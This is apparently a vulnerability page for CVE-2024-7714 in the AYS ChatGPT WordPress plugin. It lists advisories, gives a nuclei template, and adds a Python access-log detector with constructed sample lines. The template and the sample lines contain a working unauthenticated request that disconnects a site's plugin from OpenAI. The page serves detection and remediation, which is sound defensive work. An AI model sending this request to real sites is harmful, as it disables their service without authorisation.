| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2024-7714 | 27 Sep 2024 09:03 | – | circl |
| WordPress plugin AI Assistant with ChatGPT by AYS security vulnerability | 27 Sep 2024 00:00 | – | cnnvd |
| CVE-2024-7714 | 27 Sep 2024 06:00 | – | cve |
| CVE-2024-7714 AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls | 27 Sep 2024 06:00 | – | cvelist |
| EUVD-2024-48594 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2024-7714 | 27 Sep 2024 06:15 | – | nvd |
| CVE-2024-7714 | 27 Sep 2024 06:15 | – | osv |
| WordPress AI ChatBot with ChatGPT and Content Generator by AYS Plugin <= 2.0.9 is vulnerable to Broken Access Control | 27 Sep 2024 00:00 | – | patchstack |
| WordPress AI Assistant with ChatGPT by AYS plugin <= 2.0.9 - Unauthenticated AJAX Calls vulnerability | 27 Sep 2024 07:51 | – | patchstack |
| PT-2024-38530 · Ays · Ai Chatbot With Chatgpt/Content Generator | 26 Sep 2024 00:00 | – | ptsecurity |
```yaml
id: CVE-2024-7714

info:
  name: AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls
  author: s4e-io
  severity: medium
  description: |
    The plugin lacks sufficient access controls, allowing an unauthenticated user to disconnect the plugin from OpenAI and thereby disable it. Multiple actions are reachable without authentication: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback.
  impact: |
    Unauthenticated attackers can disconnect the plugin from OpenAI and manipulate plugin settings through unprotected AJAX endpoints, causing denial of service and disrupting ChatGPT assistant functionality.
  remediation: |
    Fixed in 2.1.0
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7714
    - https://wpscan.com/vulnerability/04447c76-a61b-4091-a510-c76fc8ca5664/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2024-7714
    cwe-id: CWE-284
    epss-score: 0.00848
    epss-percentile: 0.5364
  metadata:
    verified: true
    max-request: 1
    vendor: ays-chatgpt-assistant-team
    product: ays-chatgpt-assistant
    framework: wordpress
    publicwww-query: "/wp-content/plugins/ays-chatgpt-assistant"
  tags: cve,cve2024,ays-chatgpt-assistant,wordpress,wp-plugin,wp,iac,vuln,ai

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect"

    matchers:
      - type: dsl
        dsl:
          - 'regex("^true$", body)'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100c363f3e295b609bfa11bbfed0244cce622d397a75f65d79274cd9913f5fa4b34022025fa568fabd99902383f0a1e6823a160f5c48a0488139028d8fbc60d80eef57a:922c64590222798bb761d5b6d8e72950
```
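Note that the template's single request is not a passive probe: it calls `ays_chatgpt_disconnect`, so a positive match means the scanner has just disconnected the target's plugin from OpenAI. The same request is also easy to pick out of web-server logs, because the vulnerable handler is reached through `admin-ajax.php` with `action=ays_chatgpt_admin_ajax` and a `function=` parameter naming one of the three functions the advisory lists. The following detection script is an added example for this page, not part of the nuclei template or of the plugin; the access log lines it scans are constructed, and the treatment of a 4-byte `200` response as "likely succeeded" is an inference from the template's `regex("^true$", body)` matcher, not something the advisory states.

```python
"""Flag hits on the AYS ChatGPT admin-ajax functions (CVE-2024-7714) in access logs."""
import re
from urllib.parse import parse_qs, urlsplit

# The AJAX action and the three functions the advisory names as reachable unauthenticated.
AYS_ACTION = "ays_chatgpt_admin_ajax"
AYS_FUNCTIONS = {"ays_chatgpt_disconnect", "ays_chatgpt_connect", "ays_chatgpt_save_feedback"}

# Common/combined log format: client ip, timestamp, request line, status, response size.
_CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (example data, not from a real incident). Lines 1 and 3 use the
# same query string shape as the nuclei template; line 2 is a POST whose parameters would be
# in the body and are therefore invisible to this detector; line 4 is normal WordPress traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Sep/2024:09:12:01 +0000] "GET /wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect HTTP/1.1" 200 4 "-" "Mozilla/5.0"
198.51.100.4 - - [27/Sep/2024:09:12:05 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 12 "https://example.test/wp-admin/" "Mozilla/5.0"
203.0.113.7 - - [27/Sep/2024:09:13:44 +0000] "GET /wp-admin/admin-ajax.php?action=ays_chatgpt_admin_ajax&function=ays_chatgpt_connect HTTP/1.1" 200 4 "-" "curl/8.4.0"
192.0.2.9 - - [27/Sep/2024:09:14:10 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 33 "-" "Mozilla/5.0"
192.0.2.9 - - [27/Sep/2024:09:15:02 +0000] "GET /blog/wp-admin/admin-ajax.php?action=ays_chatgpt_admin_ajax&function=ays_chatgpt_save_feedback HTTP/1.1" 403 199 "-" "python-requests/2.32"
"""


def flag_ays_ajax(line):
    """Return a finding dict if `line` is an admin-ajax call into the AYS handler, else None."""
    m = _CLF.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    # WordPress may live under a sub-path, so match on the path suffix.
    if not target.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    qs = parse_qs(target.query)
    if qs.get("action", [None])[0] != AYS_ACTION:
        return None
    func = qs.get("function", [None])[0]
    if func not in AYS_FUNCTIONS:
        return None
    status = int(m["status"])
    # The template counts a 200 whose body is exactly "true" as success; that body is
    # 4 bytes, so a 4-byte 200 is consistent with the call having gone through.
    likely_success = status == 200 and m["size"] == "4"
    return {
        "ip": m["ip"],
        "ts": m["ts"],
        "method": m["method"],
        "function": func,
        "status": status,
        "likely_success": likely_success,
    }


def scan(log_text):
    """Run flag_ays_ajax over every line of `log_text` and return the findings in order."""
    return [f for f in (flag_ays_ajax(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The detector only sees what the access log records, so a POST carrying the same parameters in its body (line 2 of the sample) passes unnoticed; for coverage of that case the check belongs in a WAF or in PHP-level logging rather than in access-log review. Upgrading the plugin to 2.1.0, as the template's remediation states, removes the need for either.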